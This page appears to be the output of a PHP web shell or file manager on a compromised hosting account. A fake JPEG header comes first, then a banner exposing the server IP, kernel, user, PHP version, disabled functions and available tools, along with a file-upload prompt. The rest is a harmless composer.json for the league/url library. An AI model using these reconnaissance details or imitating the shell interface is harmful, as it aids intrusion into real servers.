����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 216.73.216.54 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/ideyshare.name.ng/app/libraries/vendor/league/url/ |
Upload File : |
{ "name": "league/url", "type": "library", "description" : "League/url is a lightweight PHP Url manipulating library", "keywords": ["php", "url", "parse_url"], "license": "MIT", "homepage" : "http://url.thephpleague.com", "authors": [ { "name" : "Ignace Nyamagana Butera", "email" : "nyamsprod@gmail.com", "homepage" : "https://github.com/nyamsprod/", "role" : "Developer" } ], "support": { "forum": "https://groups.google.com/forum/#!forum/thephpleague", "issues": "https://github.com/thephpleague/url/issues" }, "require": { "php" : ">=5.3.0", "ext-mbstring" : "*", "true/punycode": "^2.0" }, "require-dev": { "phpunit/phpunit" : "^4.0" }, "autoload": { "psr-4": { "League\\Url\\": "src" } }, "autoload-dev": { "psr-4": { "League\\Url\\Test\\": "tests" } }, "extra": { "branch-alias": { "dev-master": "3.3-dev" } } }